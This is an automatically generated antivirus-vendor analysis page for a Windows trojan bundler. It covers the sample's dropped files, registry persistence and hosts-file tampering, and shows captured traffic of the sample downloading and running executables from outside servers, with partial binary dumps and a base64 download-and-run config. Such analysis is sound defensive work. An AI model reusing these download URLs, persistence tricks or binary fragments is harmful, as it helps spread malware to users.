Application.Bundler.Temonde.HI_89f8002e3a

by malwarelabrobot on February 20th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Application.Bundler.Temonde.HI (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 89f8002e3a9f6505f6adbbbd7ad15f4b
SHA1: 5e225532d60fca398bf79abdcd2697bba8f467e3
SHA256: fd59bb065aed508fdf39bc95d87ae4ad08f2fec2f39e00b8d4fae7f144ab72be
SSDeep: 24576:NgZbjLjpVlqYonKAjJle1h5bGEDczAZSEx2G5AV3HDCWoX1R0j2ger7KDxWLZpES:NEzqJSvHpZSujyj9CwWsNKY4d
Size: 2177024 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-08 16:31:26
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

asasa.exe:888
nfarga3SormOmkom.exe:600
WeLoveYou.exe:3640
PRPCR3DZBB.exe:2192

The Application injects its code into the following process(es):

PRPCR3DZBB.exe:796
%original file name%.exe:1904

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process asasa.exe:888 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe (35240 bytes)

The process nfarga3SormOmkom.exe:600 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (212 bytes)

The process PRPCR3DZBB.exe:796 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe (116842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe.config.config (1 bytes)
C:\Windows\System32\drivers\etc\hosts (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe.config.config (1 bytes)

The process PRPCR3DZBB.exe:2192 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (174 bytes)

The process %original file name%.exe:1904 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe (11109 bytes)

Registry activity

The process asasa.exe:888 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\DMunversion]
"Version" = "6"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"EnableFileTracing" = "0"

The process WeLoveYou.exe:3640 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

The process PRPCR3DZBB.exe:796 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UC5GW" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process PRPCR3DZBB.exe:2192 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

The process %original file name%.exe:1904 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "19/02/2017"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

The Application deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
8460527fbae2c0553d95f367bd81c273	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe
664d50070c27336c31e8773c4183b502	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe
8d8274b5d9cbcbf313d28214d5f24341	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe
522a6caaecc93e18862a9e0fd7296978	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe
0ec36244b2448272be6a8974e6684a1d	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe

HOSTS file anomalies

The Application modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1386 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	validation.sls.microsoft.com
127.0.0.1	cpm.paneladmin.pro
127.0.0.1	publisher.hmdiadmingate.xyz
127.0.0.1	distribution.hmdiadmingate.xyz
127.0.0.1	hmdicrewtracksystem.xyz
127.0.0.1	beautifllink.xyz
127.0.0.1	cpm.paneladmin.pro
127.0.0.1	publisher.hmdiadmingate.xyz
127.0.0.1	distribution.hmdiadmingate.xyz
127.0.0.1	hmdicrewtracksystem.xyz
127.0.0.1	beautifllink.xyz
127.0.0.1	cpm.paneladmin.pro
127.0.0.1	publisher.hmdiadmingate.xyz
127.0.0.1	distribution.hmdiadmingate.xyz
127.0.0.1	hmdicrewtracksystem.xyz
127.0.0.1	beautifllink.xyz

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: H
Product Name: HOYB9YYFM
Product Version: 3.1.2.5
Legal Copyright: Copyright (c) 7346
Legal Trademarks:
Original Filename: Yu55AAAa.exe
Internal Name: Yu55AAAa.exe
File Version: 3.1.2.5
File Description: HO
Comments: HOYB
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	8192	2170280	2170368	4.16807	d192347b6f1479ebfea39dddf3a71d51
.rsrc	2179072	5128	5632	3.48057	27b93c8ccf91b91adfaf1683ffe3d7ec
.reloc	2187264	12	512	0.070639	a77cf5d3a5e442962d2fdd5b8214901b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://weminternal.com/download/4/replaceUninstaller.exe	94.23.252.37
hxxp://weminternal.com/download/4/nfarga3SormOmkom.exe	94.23.252.37
hxxp://weminternal.com/get/4/updater.exe	94.23.252.37
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load	94.23.44.92
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok	94.23.44.92
hxxp://weminternal.com/get/4/diskpower-uninstaller.exe	94.23.252.37
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load	94.23.44.92
hxxp://weminternal.com/get/4/remote.exe	94.23.252.37
hxxp://asiasoftwaretools.com/get/4/updater.exe	94.23.252.37
hxxp://asiasoftwaretools.com/download/4/replaceUninstaller.exe	94.23.252.37
hxxp://www.wizzmonetize.com/remotes_xml_sections.php	94.23.44.92
hxxp://asiasoftwaretools.com/get/4/diskpower-uninstaller.exe	94.23.252.37
hxxp://asiasoftwaretools.com/download/4/nfarga3SormOmkom.exe	94.23.252.37
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok	94.23.44.92

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:28 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=0b4b5gra7ensu10df2618co4t0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

HTTP/1.1 100 Continue

....

api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:28 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=42cd7b7j4c8a2kntt6q1ln4sb0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..

GET /get/4/remote.exe HTTP/1.1

Host: weminternal.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:17 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="remote.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
13800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......X.........."...0......P......R.... ... ....@.. .................
...................@.....................................O.... ..0M...
......................................................................
.. ............... ..H............text...X.... ...................... 
..`.rsrc...0M... ...N..................@..@.reloc...............6.....
.........@..B................4.......H.......8#...............9.......
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.(
....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s..
..(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"...
.....~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r..
.ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........()..
...(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2...
....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8...
o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%.
 .....o?................(....()...*.0..........r...p(.......(......&..
*.................0..9.........  ..X...{......>...(@....{.....>.
..(@...}......{....2.*...BSJB............v2.0.50727......l.......#~...
.......#Strings....0.......#US.$.......#GUID...4...|...#Blob..........
.WU.........3........>...................@.....................<<< skipped >>>

GET /download/4/replaceUninstaller.exe HTTP/1.1

Host: asiasoftwaretools.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:25 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="replaceUninstaller.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
2e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.."1.X.........."...0..............6... ...@....@.. ..................
..................@.................................p6..O....@........
...............`......85..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`.......,......
........@..B.................6......H........"...............4........
.......................................0..~.........(....o.....~.....(
......~....(....,..*...............(....(....}.......(....-..*.j.{....
n3..{......-....(....-...1..(....*.*..(....*.......*...0............~.
...r...po......,$.r?..po....t#...rO..p(....,....o.....9....(....o ...o
!...("...rS..p(#.....($...,..(%......ru..p(....,.r{..ps&....(....& B..
.r...p(....,.r...ps&....(....&  ...r...p(....,.r...ps&....(....&.($...
,.~....r...po'...r?..prO..po(.....&..*.................0..........s)..
...o*.....&.....*.*..................~....-.r...p.....(....o ...s,....
....~....*.~....*.......*.~....*..(-...*Vs....(....t.........*:.(.....
.}....*..0..........s).....{....o*.....&.....*.*................BSJB..
..........v2.0.50727......l.......#~..........#Strings........L...#US.
,.......#GUID...<...d...#Blob...........W5.........3........)......
......................................................................
.........[.....[...M.............u.....u.....u...m.u...9.u...R.u..<<< skipped >>>

GET /download/4/nfarga3SormOmkom.exe HTTP/1.1

Host: asiasoftwaretools.com


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:25 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="nfarga3SormOmkom.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
3000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
../..X.........."...0..............8... ...@....@.. ..................
..................@..................................8..O....@........
...............`......d7..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`..............
........@..B.................8......H........#...............6........
.......................................0..-.......(....(......(....(..
...#(....(....(......&..*...........)).......0..@........,;r...ps....r
...ps.....r...ps......o....-...o....-...o....*.*.*Z.,.r...ps.....o....
*.*Z.,.r...ps.....o....*.*...0..I........(....... 2.....s....o....(...
.,..(.....(......(......&....X....i2...&..*.........-..6..........EE..
.....0..6........... )......(....-...(......&....(......&....X....i2.*
.................... ..(.......0.............$...%..\.o....%.i.Y...$..
.%....o......... ......,..r...p(.......(.......X....i.Y2..( ........ .
.....o!... ....("......X.......i2.*....0...........%(....r...p(#......
"...%.r ..p.%.($....%.rZ..p.%.($....%.r...p.%.($....%.r...p.%.($....%.
r<..p.%..($....(%...(&...~'...rr..po(...-.~'...rr..po)...&..&..*...
.................(*...*.~....-.r...p.....( ...o,...s-........~....*.~.
...*.......*.~....*..(....*Vs....(/...t.........*BSJB............v2.0.
50727......l.......#~..4...h...#Strings............#US.........#GU<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1

Host: asiasoftwaretools.com


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:25 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="updater.exe"

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
215800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......X.........."...0...!..P......R$!.. ...@!...@.. ................
........!...........@..................................$!.O....@!.0M..
..................!......"!...........................................
... ............... ..H............text...X.!.. ....!.................
 ..`.rsrc...0M...@!..N....!.............@..@.reloc........!......V!...
..........@..B................4$!.....H.......8#...............9.... .
........................................6.(.....(....*z.,..{....,..{..
..o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.
(....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s.
...(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"..
......~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r.
..ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........().
....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2..
.....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8..
.o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%
. .....o?................(....()...*.0..........r...p(.......(......&.
.*.................0..9.........  ..X...{......>...(@....{.....>
...(@...}......{....2.*...BSJB............v2.0.50727......l.......#~..
........#Strings....0.......#US.$.......#GUID...4...|...#Blob.........
..WU.........3........>...................@....................<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: VVV.wizzmonetize.com

Content-Length: 154

Expect: 100-continue

Connection: Keep-Alive

remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_channel_name=1
HTTP/1.1 100 Continue

HTTP/1.1 200 OK..Date: Sun, 19 Feb 2017 01:22:22 GMT..Server: Apache/2
.4.10 (Debian)..Set-Cookie: PHPSESSID=3usmpa2vo72pfbtmu7hr1vaar4; path
=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, n
o-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache.
.Vary: Accept-Encoding..Content-Length: 1644..Keep-Alive: timeout=10, 
max=100..Connection: Keep-Alive..Content-Type: text/html; charset=UTF-
8..PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG9
3bmxvYWQgbmFtZT0iYXNhc2EiIHZhbHVlPSJodHRwOi8vYXNpYXNvZnR3YXJldG9vbHMuY
29tL2Rvd25sb2FkLzQvcmVwbGFjZVVuaW5zdGFsbGVyLmV4ZSAiIHZlcnNpb249IiIgIHN
vZnR3YXJlPSIiIG5ldD0ieWVzIi8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iY
XNhc2EiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9ImFkZCI
gbmFtZT0iYXNhc2EiIHZhbHVlPSJlZWV6NTg1OCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb
25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJhc2FzYSIgdmFsdWU9ImV
lZXo1ODU4IiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KDQo8L3Rhc2s P
HRhc2s IDxwZXJmb3JtPiA8ZG93bmxvYWQgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmF
sdWU9Imh0dHA6Ly9hc2lhc29mdHdhcmV0b29scy5jb20vZG93bmxvYWQvNC9uZmFyZ2EzU
29ybU9ta29tLmV4ZSIgdmVyc2lvbj0iIiBzb2Z0d2FyZT0iIiBuZXQ9InllcyIvPiA8cHJ
vY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmFsdWU9Im5vd
HdhaXQiIHBhcmFtcz0iIi8 IDxtb2QgdHlwZT0iYWRkIiBuYW1lPSJuZmFyZ2EzU29ybU9
ta29tIiB2YWx1ZT0iTW5heWtpbm5ubm5ubiIvPiA8L3BlcmZvcm0 IDxjb25kaXRpb25zP
iA8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJuZmFyZ2EzU29ybU9ta29tIiB2YWx1ZT0iTW5
heWtpbm5ubm5ubkJhcmNoYSIgbWF0Y2g9ImZhbHNlIi8 IDwvY29uZGl0aW9ucz4gP

<<< skipped >>>

GET /get/4/diskpower-uninstaller.exe HTTP/1.1

Host: asiasoftwaretools.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:31 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="diskpower-uninstaller.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
b7800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......X.........."...0..&...P......RD... ...`....@.. .................
...................@..................................D..O....`..0M...
........................B.............................................
.. ............... ..H............text...X$... ...&.................. 
..`.rsrc...0M...`...N...(..............@..@.reloc...............v.....
.........@..B................4D......H.......8#...............9.......
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.(
....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s..
..(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"...
.....~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r..
.ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........()..
...(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2...
....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8...
o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%.
 .....o?................(....()...*.0..........r...p(.......(......&..
*.................0..9.........  ..X...{......>...(@....{.....>.
..(@...}......{....2.*...BSJB............v2.0.50727......l.......#~...
.......#Strings....0.......#US.$.......#GUID...4...|...#Blob..........
.WU.........3........>...................@.....................<<< skipped >>>

The Application connects to the servers at the folowing location(s):

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

asasa.exe:888
nfarga3SormOmkom.exe:600
WeLoveYou.exe:3640
PRPCR3DZBB.exe:2192
Delete the original Application file.
Delete or disinfect the following files created/modified by the Application:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe (35240 bytes)
C:\Windows\System32\drivers\etc\hosts (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe (116842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe (11109 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UC5GW" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Application.Bundler.Temonde.HI_89f8002e3a

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Application.Bundler.Temonde.HI_89f8002e3a

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet